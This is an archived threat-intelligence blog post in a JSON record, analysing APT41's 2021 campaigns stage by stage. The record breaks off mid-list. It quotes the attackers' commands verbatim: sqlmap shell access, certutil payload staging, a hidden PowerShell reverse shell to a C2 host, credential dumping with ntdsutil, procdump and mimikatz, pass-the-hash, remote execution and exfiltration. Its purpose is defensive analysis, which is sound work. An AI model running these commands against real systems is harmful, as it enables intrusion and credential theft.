{
	"id": "cd6cc91c-d1f2-48df-ae5e-e7116cd4cbda",
	"created_at": "2026-05-01T03:10:32.271568Z",
	"updated_at": "2026-05-01T03:10:50.966283Z",
	"deleted_at": null,
	"sha1_hash": "9f254057fef99f7fe265e4a8a770f2f7099827cd",
	"title": "APT41 World Tour 2021 on a tight schedule",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 8575067,
	"plain_text": "APT41 World Tour 2021 on a tight schedule\r\nArchived: 2026-05-01 02:03:02 UTC\r\nIn March 2022 one of the oldest state-sponsored hacker groups, APT41, breached government networks in six US states,\r\nincluding by exploiting a vulnerability in a livestock management system, Mandiant investigators have reported.\r\nThroughout 2021, we closely watched APT41’s activity using our system called Group-IB Threat Intelligence, which is\r\ncontinuously enriched with indicators of compromise (IOCs) and new rules for hunting hacker groups and threat actors. Our\r\nefforts have resulted in about 80 proactive notifications to private and government organizations worldwide regarding\r\nAPT41 attacks (both in progress and completed) against their infrastructures so that the organizations could take the\r\nnecessary steps to protect themselves or search for traces of compromise in their networks. The data about the tactics,\r\ntechniques and procedures (TTPs) used by the attackers that we collected helped us attribute the group’s other attacks. Using\r\nthis data, we identified the threat actors’ “work” schedule, which makes it possible to describe their origin in more detail. In\r\nthis blog post, we share our findings and describe the main methods, tactics and tools used by one of the most dangerous\r\nthreat groups out there, APT41, in 2021.\r\nThis blog post, which was written to bring together existing knowledge according to the MITRE ATT\u0026CK (Adversarial\r\nTactics, Techniques \u0026 Common Knowledge) framework, details how the hackers conducted reconnaissance, gained initial\r\naccess, ensured persistence and moved across the network, as well as what they were looking for on the compromised\r\ndevices. 
In addition, we share interesting findings such as the “work” schedule and working days of the attackers, together\r\nwith artifacts they left behind.\r\nThe first thing we want to mention is that APT41 used an unusual method of creating payloads on target servers, which\r\ninvolves writing an encoded payload in the form of a Cobalt Strike Beacon to a file in multiple stages. To search for and\r\nexploit vulnerabilities, the group uses popular tools such as Acunetix, Nmap, JexBoss, sqlmap, and fofa.su (a Chinese\r\nequivalent of Shodan).\r\nInterestingly, according to sqlmap logs, the threat actors breached only half of the websites they were interested in. This\r\nsuggests that even hackers like APT41 do not always go out of their way to ensure that a breach is successful.\r\nThis blog post also uncovers subnets from which the threat actors connected to their C\u0026C servers, which is further evidence\r\nconfirming the threat’s country of origin.\r\nFor the first time, we were able to identify the group’s working hours in 2021, which are similar to regular office business\r\nhours.\r\nIT directors, heads of cybersecurity teams, SOC analysts and incident response specialists are likely to find this material\r\nuseful. Our goal is to reduce financial losses and infrastructure downtime as well as to help take preventive measures to fend\r\noff APT41 attacks.\r\nIn the conclusion section, we give advice on how to identify the group’s infrastructure and protect yours. 
Let us hunt\r\ntogether for the threats, and contribute to the fight against cybercrime — a mission worthy of a superhero.\r\nWho are APT41?\r\nA state-sponsored group whose goals include cyber espionage and financial gain\r\nActive since at least 2007\r\nAlso known as BARIUM, Winnti, LEAD, WICKED SPIDER, WICKED PANDA, Blackfly, Suckfly, Winnti\r\nUmbrella, Double Dragon\r\nSome of the group’s members were indicted by the US Department of Justice in 2020; charges against them include\r\nunauthorized access to protected computers, aggravated identity theft, money laundering, and wire fraud\r\nKey findings\r\nWe estimate that in 2021 APT41 compromised and gained various levels of access to at least 13 organizations\r\nworldwide.\r\nThe group’s targets include government and private organizations based in the US, Taiwan, India, Thailand, China,\r\nHong Kong, Mongolia, Indonesia, Vietnam, Bangladesh, Ireland, Brunei, and the UK.\r\nIn the campaigns that we analyzed, APT41 targeted the following industries: the government sector, manufacturing,\r\nhealthcare, logistics, hospitality, finance, education, telecommunications, consulting, sports, media, and travel. The\r\ntargets also included a political group, military organizations, and airlines.\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 1 of 23\n\nTo conduct reconnaissance, the threat actors use tools such as Acunetix, Nmap, Sqlmap, OneForAll, subdomain3,\r\nsubDomainsBrute, and Sublist3r.\r\nAs an initial vector, the group uses web applications vulnerable to SQL injection attacks.\r\nBy performing SQL injections, APT41 gains access to the command shell of a targeted server and becomes able to\r\nexecute commands.\r\nWe estimate that in 2021 APT41 detected and exploited SQL injection opportunities in 43 out of 86 web applications\r\nthat they probed.\r\nThe main tool used in their campaigns is a custom Cobalt Strike Beacon.\r\nAPT41’s “working” days are Monday to Friday. 
They usually start at 10 AM and finish around 7 PM (UTC+8).\r\nAttack geography and target industries\r\nFirst, we will list all the countries and industries that came to our attention in 2021. Over this period, APT41 conducted at\r\nleast four malicious campaigns, which we named based on the domain names used in the attacks: ColunmTK,\r\nDelayLinkTK, Mute-Pond, and Gentle-Voice.\r\nThe targets in these campaigns were organizations in the US, Taiwan, India, China, Thailand, Hong Kong, Mongolia,\r\nIndonesia, Vietnam, Bangladesh, Ireland, Brunei, and the UK:\r\nNews agencies, government organizations, a major electronics manufacturer, and a logistics company in Taiwan\r\nA software developer and several companies that own a chain of hotels in the US\r\nA financial organization and an educational entity in Vietnam\r\nA news agency and a software developer in China\r\nAn Indian airline\r\nTTPs\r\nThis section describes APT41’s tactics, techniques and procedures that came to the attention of Group-IB’s Threat\r\nIntelligence team in 2021.\r\nReconnaissance\r\nThe first stage of any attack is reconnaissance, as part of which threat actors use a wide range of techniques to collect data\r\nabout the target organization. They can be divided into two categories: active and passive scanning. Below is a list of tools\r\nused by APT41 from both categories:\r\nActive scanning. T1595:\r\nAcunetix vulnerability scanner\r\nNmap network scanner\r\nUtilities for brute-forcing directories on web servers: OneForAll, subdomain3, subDomainsBrute, Sublist3r\r\nJexBoss, a tool for searching for and exploiting vulnerabilities in JBoss and other Java applications\r\nPassive scanning. 
Search Open Technical Databases: Scan Databases T1596.005:\r\nfofa.su (a Chinese equivalent of shodan.io) scans the Internet and collects information about open ports and services\r\nrunning on them, which enables attackers to determine their targets and conduct attacks more effectively.\r\nInitial Access\r\nExploit public-facing application – T1190\r\nA major question for an investigator is how the attackers penetrated the target system. At the penetration stage, APT41 threat\r\nactors used various techniques, including spear-phishing emails, exploiting a range of vulnerabilities (including\r\nProxylogon), and watering hole and supply chain attacks. In the campaigns we analyzed, in some cases the threat actors\r\npenetrated target systems using SQL injections. Below we describe the commands used by APT41 in detail. Such attacks\r\nwere carried out with the publicly available tool SQLmap, which the attackers used for multiple purposes.\r\nIn some organizations APT41 members gained access to the command shell of a target server and were able to execute\r\ncertain commands. The group also used this tool to upload files to the target server. 
At this stage, the files were either Cobalt\r\nStrike Beacons or custom web shells.\r\nIn other cases, the threat actors gained access to databases with information about existing accounts, lists of employees, and\r\nplaintext and hashed passwords.\r\nNevertheless, the main tool that the attackers used in their campaigns was Cobalt Strike Beacon.\r\nSQLmap launched in various attacks:\r\npython sqlmap.py -r [Company1_domain].txt --tamper=space2comment --random-agent -p\r\nctl00%24ContentPlaceHolder1%24txtUserName,ctl00%24ContentPlaceHolder1%24txtPassword --os-shell python\r\nsqlmap.py -r [Company2_domain].txt -p \"ctl00%24MainContent%24txtUserName,ctl00%24MainContent%24txtPassword\"\r\n--is-dba --hex sqlmap.py -u [Company3_domain]/content.php?id=2141\u0026sub=153 --random-agent --tamper=space2comment\r\n--time-sec=10 --current-user python sqlmap.py -r [Company4_domain] -p\r\n\"ctl00%24ContentPlaceHolder1%24txtUserName,ctl00%24ContentPlaceHolder1%24txtPassword\" --file-write=\"/root/sqlmap/{Redacted_filename}.aspx\" --file-dest=\"{Redacted_filepath}\\\\login1.aspx\" python sqlmap.py -u\r\n\"http://[Company5_domain]/[redacted]/[redacted]/[redacted].php/?\r\npage1=DM\u0026page2=TOTAL_DATA_DOWNLOAD\u0026page3=TOTAL_DATA_DOWNLOAD\" -p \"page1\" --file-read\r\n\"/etc/passwd\"\r\nThe SQL injections enabled the threat actors to gain various levels of access to 43 out of 86 websites they probed. The\r\nfollowing diagrams were built based on sqlmap logs. According to this data, MySQL was installed on most of the\r\ncompromised websites.\r\nExecution\r\nWindows Command Shell – T1059.003 Command and Scripting Interpreter\r\nAt this stage of attack, in order to upload malicious code to target devices and execute it, the threat actors chose the\r\nfollowing unique method:\r\n1. Once the payload is compiled, it is encoded in Base64.\r\n2. 
The encoded payload is divided into chunks of 775 characters and added to a text file using the following command:\r\nEcho [Base64]{775} \u003e\u003e C:\\dns.txt\r\n3. Once the encoded payload has been written to a file, the utility called certutil with the parameter -decode is\r\nlaunched. The utility converts the Base64-encoded payload into an .exe file. Certutil is a built-in tool in Windows\r\nsystems.\r\n4. After the file is decoded, the attackers launch certutil again, with the parameter -hashfile. This parameter is\r\nnecessary to obtain the hash of the resulting file. This action has to do with the fact that the attackers conduct each\r\niteration manually and could make a mistake at a certain point. Checking the file hash helps ensure that the data has\r\nbeen written correctly and that the payload has been decoded without any errors.\r\n5. The file is then renamed and sent to other directories to cover any tracks, after which the attackers launch it.\r\nThey used Cobalt Strike Beacon as a payload. In one of the observed cases, in order to write the entire payload to a file, the\r\nthreat actors needed to repeat this action 154 times.\r\necho\r\nTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAA4fu\r\n\u003e\u003e C:\\dns.txt ---- echo\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nC:\\dns.txt echo\r\n5kgXfx+Ig8S1vr8p7ifpkRNTIwypOpYrBDdptgjbLcJBcAUqEK/+D85bYT9RGiYYZ9UR4ejo6ca0B/iWEW8b+R286/evHFAXOOcuv4l8ceD1GQ9dDA\r\nC:\\dns.txt\r\ncertutil -decode C:\\dns.txt C:\\dns.exe certutil -hashfile C:\\dns.exe copy C:\\dns.exe C:\\WINDOWS\\dns.exe move C:\\dns.exe\r\nC:\\windows\\mciwave.exe\r\nThe same method of dividing the payload was observed in the network belonging to another organization, where the threat\r\nactors divided the code into chunks of 1,024 characters. 
To write the payload fully, in this case they needed 128 iterations.\r\necho\r\no3wiZy3M7pERynevamNQTtL5VZf3C+vS22sRbsUgj8Lw005hIB1mVlNyvdw5GWrKgdMrpkJ2mYamD3sHBuU6yKJ8M3JwfxkkhEtSdi2WJdVfM8zh\r\n\u003e\u003e C:\\temp\\bug.txt echo\r\nWv39JqjpZEGW7rjPYW5t09Ck9AQTc94kJ5nfTPEh6KVvRAeuMw23lQdZy/ZquMQOcy9ozRl7OyrQPtKwHYC0+pZ5Lg0Jt5DXREFurZwk0FJzMkT\r\n\u003e\u003e C:\\temp\\bug.txt\r\nBelow are other identified methods of uploading and executing malicious files. These are not unique:\r\nCommand and Scripting Interpreter: PowerShell – T1059.001\r\nAPT41 used PowerShell to obtain a reverse shell. The PowerShell code that the group used was executed in stealth mode\r\nand meant that the device it was executed on could communicate with the C\u0026C server, which in turn allowed the threat\r\nactors to execute remote commands.\r\npowershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('{redacted}',\r\n80);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function\r\nWriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String +\r\n'SHELL\u003e ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0,\r\n$Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try\r\n{Invoke-Expression $Command 2\u003e\u00261 | Out-String} catch {$_ | Out-String}WriteToStream\r\n($Output)}$StreamWriter.Close()\"\r\nScheduled Task/Job: Scheduled Task – T1053.005\r\nTask Scheduler was used to launch malicious files on computers where the threat actors already had sessions as well as on\r\ncomputers that the group discovered during reconnaissance.\r\nSCHTASKS /Create /S 192.168.100.19 /U \"{redacted}\\administrator\" /P \"!@#Virg0#@!\" /RU SYSTEM /SC DAILY /TN\r\nExec2022 /TR \"C:\\windows\\system32\\taskhosts.exe\" SCHTASKS /run /S 192.168.100.19 /U 
\"{redacted}\\administrator\" /P\r\n\"!@#Virg0#@!\" /TN Exec2022\r\nSystem Services: Service Execution – T1569.002\r\nWindows services were created and launched with the aim of running either an executable or a script file called install.bat.\r\nWe described it in our blog post about the ColunmTK campaign. This file has been mentioned several times by other\r\nvendors (e.g., Mandiant), which is why we are not describing it in detail here.\r\nsc \\\\172.16.2.146 Create SuperIe binPath= \"cmd.exe /k \"c:\\users\\public\\install.bat\"; sc \\\\192.168.111.112 create res\r\nbinpath=\"C:\\PerfLogs\\vmserver.exe\"; sc \\\\192.168.111.112 start res; sc query LxpSrvc; sc delete LxpSrvc;\r\nWindows Management Instrumentation – T1047\r\nThe hackers did not overlook Windows Management Instrumentation and used the technique in several malicious\r\ncampaigns.\r\nwmic /node:172.19.97.102 /user:{redacted}\\{redacted} /password:P$ssw0rd0006 process call create\r\n\"C:\\users\\Public\\COMSysUpdate.exe\" wmic /node:172.21.2.177 /user:{redacted}\\{redacted} /password:Passw0rd@123\r\nprocess call create \"c:\\users\\Public\\install.bat\"\r\nPersistence\r\nTo ensure persistence in target systems, the attackers used Task Scheduler and created Windows services.\r\nScheduled Task/Job: At (Windows) – T1053.002\r\nschtasks /create /s 192.168.111.3 /u {redacted} /p {redacted} /tn dda /sc onstart /tr C:\\PerfLogs\\vmserver64.exe /ru system /f\r\nSCHTASKS /Create /S 10.200.244.222 /U test\\administrator /P {redacted} /RU \"system\" /tn rlsv /sc DAILY /tr c:\\2012.bat\r\n/F SCHTASKS /Create /S 192.168.100.19 /U \"{redacted}\\administrator\" /P {redacted} /RU SYSTEM /SC DAILY /TN\r\nExec2022 /TR \"C:\\windows\\system32\\taskhosts.exe\" schtasks /create /tn rlsv1 /U test\\Administrator /P {redacted} /tr\r\nC:\\2012.bat /sc DAILY /s 10.200.244.222 /RU system SCHTASKS /Create /RU SYSTEM /SC ONSTART /TN Update 
/TR\r\n\"C:\\windows\\system32\\calc.exe\" SCHTASKS /Create /RU SYSTEM /SC ONSTART /TN dllhosts /TR \"dllhosts.exe\"\r\nschtasks.exe /s 192.168.0.28 /u \"administrator\" /p {redacted} /Create /tn VMUSS /tr \"c:\\users\\public\\install.bat\" /st 15:58 /sc\r\nonce /ru system\r\nSystem Services: Service Execution – T1543.003\r\nsc \\\\172.26.16.81 Create SuperIe binPath= \"cmd.exe /k c:\\users\\public\\SecurityHealthSystray.exe\" sc Create syscmd\r\nbinpath=\"cmd/k start\"type= own type= interact sc \\\\192.168.111.112 create res binpath=\"C:\\PerfLogs\\vmserver.exe\" sc start\r\nLxpSrvc\r\nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder – T1547.001\r\nIn some cases the threat actors placed their malicious files in the startup folder on remote computers, which made the files\r\nexecute every time the victim’s operating system was launched.\r\ncopy C:\\temp\\LxpSvc.exe \"\\\\192.168.100.4\\c$\\Users\\administrator.{redacted}\\AppData\\Roaming\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\LxpSvc.exe\"\r\nPrivilege Escalation\r\nOur analysis did not reveal any instances of APT41 using unique ways of escalating privileges in the network. In addition to\r\nthe standard capabilities of Cobalt Strike, for such purposes APT41 mainly used additional modules and cna. Publicly\r\navailable tools for local privilege escalation (such as BadPotato) were also used to establish persistence. Moreover, the\r\nattackers used password hashes or accounts obtained at the reconnaissance stage.\r\ncmd.exe /c c:\\windows\\Temp\\BadPotatoNet4.exe c:\\windows\\Temp\\COMSysCon.exe; execute-assembly\r\nC:\\Users\\Administrator\\Desktop\\SweetPotato.exe E:\\Projects\\Operations\\uploads\\documents\\docs\\AxInstSV.exe.\r\nDefense Evasion\r\nObfuscated Files or Information: Software Packing – T1027.002\r\nBeing discreet and staying in the victim’s network unnoticed for as long as possible is the goal of any APT. 
How did APT41\r\nmembers try to avoid being noticed and cover their tracks? The threat actors used the well-known protection tool Themida to\r\nobfuscate their malicious files.\r\nIndicator Removal on Host: File Deletion – T1070.004\r\nWhen certain files were no longer needed, the attackers deleted them.\r\ndel C:\\temp\\LxpSvc.exe del c:\\users\\public\\BadPotatoNet4.exe del \\\\172.16.2.21\\c$\\users\\Public\\SecurityHealthSystray.dll\r\ndel \\\\172.16.2.21\\c$\\users\\Public\\SecurityHealthSystra.ocx copy \"C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx\" \"C:\\PerfLogs\\mwt.evtx\" C:\\PerfLogs\\mwt.evtx rm\r\nC:\\PerfLogs\\mwt.evtx\r\nFile and Directory Permissions Modification: Windows File and Directory Permissions Modification – T1222\r\nicacls \\\\192.168.0.243\\c$\\www\\{redacted}\\test2.asp /grant IIS_IUSRS:F\r\nImpair Defenses: Indicator Blocking – T1562.006\r\nAs mentioned earlier, Cobalt Strike was the main tool used in all the campaigns.\r\nThe threat actors developed a custom injector that makes it possible to bypass Event Tracing for Windows (ETW),\r\nthereby making the process invisible to the logging system in Windows.\r\nThe second noteworthy feature of this injector is a method taken from an open GitHub repository. The idea is to be\r\nable to launch a new process in such a way as to ensure that neither Windows nor antivirus software can inject their\r\nbinaries into this process, which enables the threat actors to bypass built-in antivirus tools.\r\nThe tool is called StealthMutant and it has been described in detail by researchers at Trend Micro.\r\nCredential Access\r\nThis section outlines how the threat actors obtained credentials. 
To do so, APT41 uses several different, fairly popular\r\ntechniques.\r\nOS Credential Dumping: NTDS – T1003.003\r\nThe Group-IB Threat Intelligence team discovered that 2021 APT41 campaigns most often involved a Windows utility\r\ncalled Ntdsutil. The attackers used the tool to obtain a copy of the ntds.dit file, which is a database that stores Active\r\nDirectory data, including information about user objects, groups, and group membership. The database also includes the\r\npassword hashes for all the users of the domain.\r\nntdsutil \"ac i ntds\" \"ifm\" \"create full C:\\perflogs\\temp\" q q ntdsutil \"activate instance ntds\" \"ifm\" \"create full\r\nC:\\PerfLogs\\temp\" quit quit\r\nOS Credential Dumping: Security Account Manager – T1003.002\r\nThe threat actors also extracted account data from the Security Account Manager (SAM). SAM manages the Windows\r\naccount database, which includes storing passwords and private user data, grouping the logical structure of accounts, setting\r\nsecurity policies, collecting statistics, and controlling access to the database. This data is available either in the registry key\r\nHKEY_LOCAL_MACHINE\\SAM\\SAM or in a binary file at %WINDIR%\\System32\\Config\\SAM. The attackers tried to\r\nmake a copy of this database from the registry using the “reg save” command or by exploiting volume shadow copies.\r\nreg save HKLM\\SAM C:\\perflogs \\sam.save copy \\\\?\r\n\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy11\\Windows\\System32\\config\\SAM c:\\users\\public\\SAM\r\nOS Credential Dumping: LSASS Memory – T1003.001\r\nAnother source of account credentials is the Local Security Authority Subsystem Service (LSASS) memory. It is a process\r\nin Microsoft Windows operating systems that enforces the security policy on the system. It verifies users logging on to a\r\nWindows computer or server, handles password changes, and creates access tokens. 
To dump the LSASS process, the threat\r\nactors used the utilities Procdump and Mimikatz.\r\nprocdump64.exe -accepteula -ma lsass.exe lsass.dmp C:\\mi.exe \"\"privilege::debug\"\" \"\"sekurlsa::logonpasswords full\"\" exit\r\n\u003e\u003e C:\\log.tx mimikatz's sekurlsa::logonpasswords\r\nCredentials from Password Stores: Credentials from Web Browsers – T1555.003\r\nThe threat actors used BrowserGhost, which is a tool designed to obtain credentials from browsers.\r\nBrowserGhost.exe \u003e\u003e iis.txt\r\nUnsecured Credentials: Credentials In Files – T1552.001\r\nThe attackers also searched for strings that contain keywords like “user” or “password” in specific files or entire directories.\r\nfindstr /c:\"User\" /c:\"Password\" /si web.config findstr /c:\"User ID=\" /c:\"Password=\"\r\nDiscovery\r\nThreat actors usually use this stage to obtain more information about the infected computer and its local network. At this\r\npoint, cybercriminals most often leverage the tools built into the operating system.\r\nAccount Discovery – T1087\r\nThe Net utility is used to display information about the computer’s network configuration. 
The utility helped the adversaries\r\ngather information about domain group membership and collect lists of administrators.\r\nnet user /domain \u003e 1.txt net user net localgroup administrators net accounts /domain net group \"Domain Admins\"\r\nSystem Information Discovery – T1082\r\nAt this stage, the attackers gathered information about the system’s basic configuration (e.g., the Windows version or system\r\narchitecture).\r\necho %PROCESSOR_ARCHITECTURE% systeminfo whoami net config Workstation\r\nPermission Groups Discovery – T1069\r\nThe adversary obtained a list of objects from Windows groups as follows:\r\nnet group \"Domain Admins\" /domain net group \"domain Controllers\" net group \"Exchange Servers\" net group \"Schema\r\nAdmins\" net group \"Protected Users\" net group \"Enterprise Admins\" net group \"Enterprise Read-only Domain Controllers\"\r\nnet group \"Exchange Domain Servers\"\r\nQuery Registry – T1012\r\nThe hackers made queries to the registry to obtain information about the currently used RDP ports or network\r\nconfigurations.\r\nreg query \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server\\WinStations\\RDP-Tcp /v PortNumber\" reg\r\nquery \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" reg query\r\n\"HKEY_LOCAL_MACHINE \\SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters\\Interfaces\\{1f777394-0b42-11e3-\r\n80ad-806e6f6e6963}\"\r\nDomain Trust Discovery – T1482\r\ndsquery site\r\nSystem Time Discovery – T1124\r\nnet time /domain\r\nProcess Discovery – T1057\r\nIn some cases, the threat actors conducted reconnaissance on remote devices to establish whether files with certain names\r\nwere running on them. 
The attackers had downloaded these files to remote devices earlier.\r\ntasklist /pid 1428 /f tasklist /s 172.16.2.132 /u test\\administrator /p {redacted} tasklist | findstr update_x64.exe\r\nNetwork Service Scanning – T1046\r\nAt this stage, the threat actors also used a publicly available tool called cping to identify local computers vulnerable to SMB\r\nattacks.\r\nC:\\PerfLogs\\cping40.exe scan smbvul 10.0.0.1 10.0.10.1 \u003e 10.txt cping40.exe scan smbvul 192.168.20.1 192.168.29.1 \u003e\r\n30.txt\r\nNetwork Share Discovery – T1135\r\nThe threat actors attempted to detect available network drives:\r\nnet share net view /DOMAIN\r\nSystem Network Configuration Discovery – T1016\r\nOne of the ways in which the threat actor obtained information about the available network configuration was to access the\r\nregistry key directly:\r\nreg query \"HKEY_LOCAL_MACHINE \\SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters\\Interfaces\\{1f777394-\r\n0b42-11e3-80ad-806e6f6e6963}\"\r\nSystem Network Connections Discovery – T1049\r\nTo identify network connections, the hackers used a built-in utility called netstat:\r\nnetstat -ano netstat -r netstat -an netstat -aon|findstr \"8080\" netstat -ano | findstr dns.exe\r\nRemote System Discovery – T1018\r\nThe hackers used the Ping command with a single echo request to identify other devices on the local network. In order to\r\nsimplify their tasks, they used a FOR loop. They also used the SETSPN utility to identify on which devices in the domain a\r\nparticular service was running. 
This helped the attackers identify which devices were running the following services: IIS,\r\nSQL and MSSQL.\r\nIt is important to note that in one of the cases we analyzed, the threat actors used the “payload” string instead of the\r\nnecessary one, which indicates that the command was copied from another source.\r\nping -n 1 PIST-FILE-SRV for /l %i in (1,1,255) do @ping 172.67.204.%i -w 1 -n 1|find /i \"ttl=\" setspn -T\r\n[target_company_name4] -Q */* | payload setspn -T [target_company_name6] -Q */* | findstr IIS setspn -T\r\n[target_company_name5] -Q */* | findstr SQL setspn -T [target_company_name6] -Q */* | findstr MSSQL\r\nLateral Movement\r\nTo move laterally, the threat actors used credentials gathered at the previous stage. If they only had password hashes, they\r\ncarried out Pass-The-Hash attacks using Mimikatz.\r\nUse Alternate Authentication Material: Pass the Hash – T1550.002\r\nmimikatz's sekurlsa::pth /user:Administrator /domain:{redacted} /ntlm:{redacted} /run:\"%COMSPEC% /c echo\r\n70c64df2976 \u003e \\\\.\\pipe\\277bf3\" mimikatz's sekurlsa::pth /user:{redacted} /domain:{redacted} /ntlm:{redacted}\r\n/run:\"%COMSPEC% /c echo 22074328564 \u003e \\\\.\\pipe\\bce0a1\"\r\nLateral Tool Transfer – T1570\r\njump psexec64 {redacted} dns windows/beacon_dns/reverse_dns_txt (ns1.colunm.tk:53) on {redacted} via Service Control\r\nManager (\\\\[redacted]\\ADMIN$\\c3632b3.exe) copy c:\\users\\public\\COMSysUpdate.exe\r\n\\\\172.19.97.101\\c$\\users\\public\\COMSysUpdate.exe\r\nCollection\r\nArchive Collected Data: Archive via Utility – T1560.001\r\nTo collect data, APT41 downloaded a portable archiver file to compromised devices. 
The group archived the necessary files\r\nand exfiltrated them to their intermediate server.\r\n7z.exe a syslog.7z Intl 7z.exe a iislog.7z Intl 7z.exe a Ops.7z C:\\PerfLogs\\Ops\\ C:\\perflogs\\7z.exe a -tzip C:\\perflogs\\nt.zip\r\nC:\\perflogs\\temp\\\r\nData from Configuration Repository – T1602\r\nOn the network belonging to a software developer, the hackers gained access to the developer’s private GitHub repository.\r\nThe repository was used to store various sensitive data such as credentials for remote servers, private certificates, and a list\r\nof servers.\r\nshell git clone \"ssh://jenkins@{redacted}:29418/DevOps/Playbook2\" shell git clone\r\n\"ssh://jenkins@{redacted}:29418/DevOps/Inventory/Cloud/Intl\" shell git clone\r\n\"ssh://jenkins@192.168.0.251:29418/DevOps/Inventory\"\r\nData from Local System – T1005\r\nThe group obtained files from shadow copies and the Windows logging system.\r\nvssadmin list shadows vssadmin create shadow /for=c: vssadmin delete shadows /for=c: /quiet esentutl /p /o ntds.dit copy\r\n\"C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx\" \"C:\\PerfLogs\\mwt.evtx\" copy\r\n\"C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx\" \"C:\\PerfLogs\\mwt.evtx\" rd:true /q:\"*[System[(EventID=4624 or\r\nEventID=4648 or EventID=4672)] and EventData[(Data[@Name='LogonType']='2' or Data[@Name='LogonType']='10')]]\"|\r\nfindstr /i /c:\"Date\" /c:\"Logon Type:\" / c:\"Account Name\" /c:\"Workstation Name:\" / c:\"Source Network Address\"\r\nCommand and Control\r\nAs mentioned above, most APT41 attacks were conducted using Cobalt Strike.\r\nApplication Layer Protocol: Web Protocols – T1071.001\r\nThe group used HTTP and HTTPS listeners to communicate with C\u0026C servers.\r\nApplication Layer Protocol: DNS – T1071.004\r\nTo hide all communication 
with C\u0026C servers, the threat actors also used DNS tunnels.\r\nIngress Tool Transfer – T1105\r\nThe threat actors used Cobalt Strike to upload their files to compromised devices. For certain targeted organizations, the\r\ngroup uploaded files from special directories named after the compromised organization.\r\nupload C:\\Users\\Administrator\\Desktop\\cs\\dns\\COMSysUpdate.ocx upload\r\nC:\\Users\\Administrator\\Desktop\\webshell\\uploada4.aspx upload c:\\users\\alex\\desktop\\smb.exe upload\r\nC:\\Users\\Administrator\\Desktop\\cs\\SecurityHealthSystray.dll upload C:\\Users\\Administrator\\Desktop\\cs\\install.bat upload\r\nC:\\Users\\jack\\Desktop\\tmp\\cs_shell\\server\\install.bat upload C:\\Users\\jack\\Desktop\\tmp\\cs_shell\\server\\bthsvc64.dll upload\r\nC:\\Users\\jack\\Desktop\\tmp\\procdump64.exe upload C:\\Users\\jack\\Desktop\\{redacted}\\244\\mciwave32.dll upload\r\nC:\\Users\\Admin\\Desktop\\{redacted}\\HTTPS\\LxpSvc.exe upload C:\\Users\\Admin\\Desktop\\Webshell upload\r\nC:\\Users\\Admin\\Desktop\\{redacted}\\webshell\\test4.aspx upload C:\\Users\\Admin\\Desktop\\{redacted}\\远控\r\n\\service\\install.bat upload C:\\Users\\Admin\\Desktop\\{redacted}\\LxpSrvc.dll upload C:\\Users\\Admin\\Desktop\\{redacted}\\远\r\n控\\exe\\dfss.dll upload C:\\Users\\Administrator\\Desktop\\BadPotatoNet4.exe\r\nProxy: Internal Proxy – T1090.001\r\nIn the attacks we analyzed, APT41 often used a tool for proxying traffic called FRPC.\r\nfrcp.exe -c frcp.ini\r\nExfiltration\r\nExfiltration Over C2 Channel – T1041\r\nAt the exfiltration stage, APT41 gained access to various server configurations, backup data, and user data. 
The group most\r\nlikely did not exfiltrate a large amount of confidential documents.\r\ndownload D:\\projects\\{redacted}\\web.config; download D:\\projects\\{redacted}\\css\\help.txt; download D:\\System Volume\r\nInformation\\002.dat; download D:\\projects\\{redacted}\\Web.config; download D:\\{redacted}\\\r\n{redacted}20210301120008.txt; download c:\\ftpcmd.dat; download c:\\AppTextFile.txt; download\r\nc:\\Users\\Administrator\\Desktop\\OfcNTCer.dat; download c:\\Users\\{redacted}\\Desktop\\172.16.11.103.png; download\r\nc:\\Users\\{redacted}\\Desktop\\FTP batch\\ftp_servername.bat; download c:\\Users\\{redacted}\\Desktop\\FTP batch\\\r\n[redacted].bat; download c:\\Users\\{redacted}\\Desktop\\tm remote chat.txt; download c:\\Temp\\netstat.txt; download\r\nc:\\Program Files (x86)\\Trend Micro\\OfficeScan\\PCCSRV\\Admin\\web.config; download c:\\Program Files (x86)\\Trend\r\nMicro\\OfficeScan\\PCCSRV\\Admin\\Utility\\SQL\\web.config; download c:\\Program Files (x86)\\Trend\r\nMicro\\OfficeScan\\PCCSRV\\Web\\web.config; download c:\\Program Files (x86)\\Trend\r\nMicro\\OfficeScan\\PCCSRV\\Web_OSCE\\Web_console\\HTML\\widget_old\\repository\\inc\\class\\common\\crypt\\web.config ;\r\ndownload c:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ASP.NETWebAdminFiles\\web.config; download\r\nc:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\web.config; download\r\nc:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ASP.NETWebAdminFiles\\web.config; download\r\nc:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\web.config; 